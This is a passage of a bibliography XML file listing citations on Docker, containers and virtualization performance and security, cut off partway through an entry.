      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Radchenko</b:Last>
            <b:First>G</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Alaasam</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tchernykh</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative Analysis of Virtualization Methods In Big Data Processing </b:Title>
    <b:JournalName>Supercomputing Frontiers and Innovations</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>48-79</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DSa20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9D993DFF-7BDF-487B-A6A7-005ABE550E67}</b:Guid>
    <b:Title>The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and Containerization Platforms</b:Title>
    <b:JournalName>arXiv preprint arXiv:2006.02055</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-11</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>2</b:Issue>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Samani</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Denninnart</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bacik</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OBe21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{75C4BF86-89B6-4F7C-9639-106727FB8D93}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bentaleb</b:Last>
            <b:First>O</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Belloum</b:Last>
            <b:First>A.S.Z</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sebaa</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Containerization technologies: taxonomies, applications and challenges</b:Title>
    <b:JournalName>The Journal of Supercomputing</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-38</b:Pages>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MMo20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C06F39D-EC63-4C4D-9FC6-C38A77B8CD3A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Moravcik</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Segec</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Kontsek</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparison of LXC and Docker Technologies</b:Title>
    <b:JournalName>ICETA 2020 - 18th IEEE International Conference on Emerging eLearning Technologies and Applications, Proceedings</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>481-486</b:Pages>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ANJ15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C444353-85FF-48DF-AEC1-EA6EFCECD666}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Joy</b:Last>
            <b:First>A.N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Performance comparison between Linux containers and virtual machines</b:Title>
    <b:JournalName>Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>342-346</b:Pages>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>QZh18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3D854018-AA57-4D3E-BD98-C5D76C33DE1E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Zhang</b:Last>
            <b:First>Q</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Liu</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Pu</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A Comparative Study of Containers and Virtual Machines in Big Data Environment</b:Title>
    <b:JournalName>IEEE International Conference on Cloud Computing, CLOUD</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>178-185</b:Pages>
    <b:Volume>2018-July</b:Volume>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>XXi17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{87C0D30C-9DD5-4931-9778-96109EAD058F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Xie</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wang</b:Last>
            <b:First>Q</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The performance analysis of Docker and rkt based on Kubernetes</b:Title>
    <b:JournalName>ICNC-FSKD 2017 - 13th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>2137-2141</b:Pages>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BRa17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{74A2B726-378F-4855-97F2-7C9C8B23578D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rad</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bhatti</b:Last>
            <b:First>H.</b:First>
            <b:Middle>J</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Ahmadi</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>An Introduction to Docker and Analysis of its Performance</b:Title>
    <b:JournalName>ITCSNS International Journal of Computer Science and Network Security</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>228-235</b:Pages>
    <b:Volume>17</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMP20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{65B7F023-A24B-4671-878A-05688A60C7FB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Potdar</b:Last>
            <b:First>A.</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Kengond</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mulla</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Perfromance evaluation of docker container and virtual machine</b:Title>
    <b:JournalName>Procedia Computer Science</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1419-1428</b:Pages>
    <b:Volume>171</b:Volume>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C6F94609-5B0F-45A2-AC81-4A34F0CD1808}</b:Guid>
    <b:Title>Docker Overview</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://docs.docker.com/get-started/overview/</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sit21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{61B02383-D8F8-4E30-B00D-8ECD8DF069A0}</b:Guid>
    <b:Title>Study of Container Technology with Docker</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sitaram</b:Last>
          </b:Person>
          <b:Person>
            <b:Last>Paktar</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Journal of Advanced Research in Science, Communication and Technology (IJARSCT)</b:JournalName>
    <b:Pages>504-509</b:Pages>
    <b:Volume>5</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ASH13</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{6059D442-F489-4043-882D-E8F9117665E4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Harji</b:Last>
            <b:First>A.</b:First>
            <b:Middle>S</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Buhr</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Brecht</b:Last>
            <b:First>T</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Our troubles with Linux Kernel upgrades and why you should care</b:Title>
    <b:JournalName>ACM SIGOPS Operating system Review</b:JournalName>
    <b:Year>2013</b:Year>
    <b:Pages>66-72</b:Pages>
    <b:Volume>47</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VTu15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{3C463D7A-B3DC-4E85-AA80-5CD419FE0872}</b:Guid>
    <b:Title>Advantages of docker</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Tuomas</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VSh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{FEEA2B80-8492-46BF-B65A-922F09F2F0C1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sharma</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Saxena</b:Last>
            <b:First>H</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>A</b:First>
            <b:Middle>K.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker for Multi-containers web application </b:Title>
    <b:JournalName>2nd International Conference on Innovative Mechanisms for Industry Applications, ICIMIA 2020 - Conference Proceedings</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>589-592</b:Pages>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ONa20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1BC526AE-0548-41D3-8949-DDE452B17A5F}</b:Guid>
    <b:Title>5 Key Benefits of Docker: CI, Version Control, Portability, Isolation and Security</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nachmani</b:Last>
            <b:First>O</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>DZone</b:ProductionCompany>
    <b:Month>April</b:Month>
    <b:Day>19</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>19</b:DayAccessed>
    <b:URL>https://dzone.com/articles/5-key-benefits-docker-ci</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sin16</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{99DA1856-4600-4AB1-B015-3B49EB649AE4}</b:Guid>
    <b:Title>Containers &amp; Docker: Emerging roles &amp; future of Cloud technology</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>N</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ConferenceName>Proceedings of the 2016 2nd International Conference on Applied and Theoretical Computing and Communication Technology, iCATccT 2016</b:ConferenceName>
    <b:City>Bangalore</b:City>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>FŠp15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{19060A67-FB56-4ED5-81C7-5A66AB16F741}</b:Guid>
    <b:Title>Docker as Platform for Assignments Evaluation</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Špaček</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sohlich</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>T</b:Last>
            <b:First>Dulík</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Procedia Engineering</b:JournalName>
    <b:Pages>1665-1671</b:Pages>
    <b:Volume>100</b:Volume>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc211</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0566A9A7-5C7C-40A5-BE3E-425B0549A5C8}</b:Guid>
    <b:Title>Docker overview | Docker Documentation</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://docs.docker.com/get-started/overview/</b:URL>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DNü20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{82F1112A-2D1D-43CB-B337-4AEC00FF7EBF}</b:Guid>
    <b:Title>Ten simple rules for writing Dockerfiles for reproducible data science</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nüst</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Sochat</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Marwick</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>PLOS Computational Biology</b:JournalName>
    <b:Pages>e1008316</b:Pages>
    <b:Volume>16</b:Volume>
    <b:Issue>11</b:Issue>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CZh18</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{50BB9A3D-A2AD-4953-B325-45CD0DCBFB27}</b:Guid>
    <b:Title>Wharf: Sharing Docker Images in a Distributed File System</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Zheng</b:Last>
            <b:First>C</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rupprecht</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tarasov</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>et.al</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ConferenceName>Proceeding of the ACM Symposium on Cloud Computing</b:ConferenceName>
    <b:City>Carlsbad</b:City>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DSk19</b:Tag>
    <b:SourceType>ConferenceProceedings</b:SourceType>
    <b:Guid>{2320DC30-E5C7-4E27-B2ED-E6C8439F0576}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Skourtis</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rupprecht</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tarasov</b:Last>
            <b:First>V</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Carving perfect layers out of docker images</b:Title>
    <b:Year>2019</b:Year>
    <b:ConferenceName>HotCloud 19</b:ConferenceName>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SBh18</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{A79BFB3C-FF7E-4486-A967-2F6D280B40C0}</b:Guid>
    <b:Title>Understanding the Dockerfile</b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bhat</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Practical Docker with Python</b:BookTitle>
    <b:Pages>53-89</b:Pages>
    <b:Publisher>Springer</b:Publisher>
    <b:RefOrder>29</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97058410-9F8A-4095-B043-4C4F27B41A37}</b:Guid>
    <b:Title>About storage drivers | Docker Documentation</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2020</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://docs.docker.com/storage/storagedriver/</b:URL>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JSp19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{36A3E958-73CC-4B23-B8DB-C85EFE972736}</b:Guid>
    <b:Title>Enabling Docker for HPC</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sparks</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Concurrency and Computation: Practice and Experience</b:JournalName>
    <b:Pages>e5018</b:Pages>
    <b:Volume>31</b:Volume>
    <b:Issue>16</b:Issue>
    <b:RefOrder>30</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NKh19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4994AED8-1778-4F4D-9E01-8259C088C308}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Khandhar</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Shah</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker-The Future of Virtualization</b:Title>
    <b:JournalName>International Journal of Research and Analytical Reviews</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>164-167</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>31</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mud19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B9F18C64-5E95-4EBA-A136-0A4573E580FC}</b:Guid>
    <b:Title>Self-Hosted Kubernetes: Deploying Docker Containers Locally with Minikube</b:Title>
    <b:JournalName>Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>239-243</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Muddinagiri</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ambavane</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Bayas</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:ConferenceName>Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019</b:ConferenceName>
    <b:RefOrder>32</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ABA17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{31395B95-DA8C-411D-890E-DED38FFC82A9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ayed</b:Last>
            <b:First>A</b:First>
            <b:Middle>B.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Subercaze</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Laforest</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker2RDF: Lifting the Docker Registry Hub into RDF</b:Title>
    <b:JournalName>2017 IEEE World Congress on Services (SERVICES)</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>36-39</b:Pages>
    <b:RefOrder>33</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NMo21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E0D69C74-AE3F-441B-8654-E45A0267DB1A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mohd</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mydin</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ismail</b:Last>
            <b:First>I</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>An Operational View into Docker Registry with Scalability, Access Control and Image Assessment Bukhary ikhwan Ismail Malaysian Institute of Microelectronic Systems An Operational View into Docker Registry with Scalability, Access Control and Image Assessm</b:Title>
    <b:JournalName>researchgate</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:RefOrder>34</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMJ15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9201C696-505F-4B8E-B1D6-6C73EC6E6856}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Joy</b:Last>
            <b:First>A.</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Performance comparison between Linux containers and virtual machines</b:Title>
    <b:JournalName>Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>342-346</b:Pages>
    <b:RefOrder>36</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>EBa15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E977AE1E-A246-4D31-A2FC-E26BADA9FE9C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bacis</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mutti</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Capelli</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>DockerPolicyModules: Mandatory Access Control for Docker containers</b:Title>
    <b:JournalName>2015 IEEE Conference on Communications and NetworkSecurity, CNS 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>749-750</b:Pages>
    <b:RefOrder>37</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RRo14</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{77E78317-5E65-4BE5-BD3B-18F307D4922E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rosen</b:Last>
            <b:First>R</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Linux containers and the future cloud</b:Title>
    <b:JournalName>Linux J</b:JournalName>
    <b:Year>2014</b:Year>
    <b:Pages>86-95</b:Pages>
    <b:Volume>240</b:Volume>
    <b:Issue>4</b:Issue>
    <b:RefOrder>38</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>KOh19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{328DB82D-0851-406E-B27C-4632256CA636}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Oh</b:Last>
            <b:First>K</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Park</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Eom</b:Last>
            <b:First>Y</b:First>
            <b:Middle>I.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Weight-Based Page Cache Management Scheme for Enhancing I/O Proportionality of Cgroups</b:Title>
    <b:JournalName>2019 IEEE International Conference on Consumer Electronics, ICCE 2019</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>1-3</b:Pages>
    <b:RefOrder>39</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc212</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6A6D4EE5-F5E3-4A25-AC67-BF475607A7A4}</b:Guid>
    <b:Title>Docker Security</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>6</b:DayAccessed>
    <b:URL>https://docs.docker.com/engine/security/</b:URL>
    <b:RefOrder>35</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DHu19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4501B8CF-56DD-49BB-967B-ADD0E54CD125}</b:Guid>
    <b:Title>Security Analysis and Threats Detection Techniques on Docker Container</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Huang</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Cui</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wen</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Huang</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>2019 IEEE 5th International Conference on Computer and Communications (ICCC)</b:JournalName>
    <b:Pages>1214-1220</b:Pages>
    <b:RefOrder>40</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0E2E1EAD-7B67-4802-9291-626B6DC48C80}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Martin</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Raponi</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Combe</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker ecosystem – Vulnerability Analysis</b:Title>
    <b:JournalName>Computer Communications</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>30-43</b:Pages>
    <b:Volume>122</b:Volume>
    <b:Issue>6</b:Issue>
    <b:RefOrder>41</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>HZh21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{AD0D7FDF-F8AE-4BB6-B30B-044700C24873}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
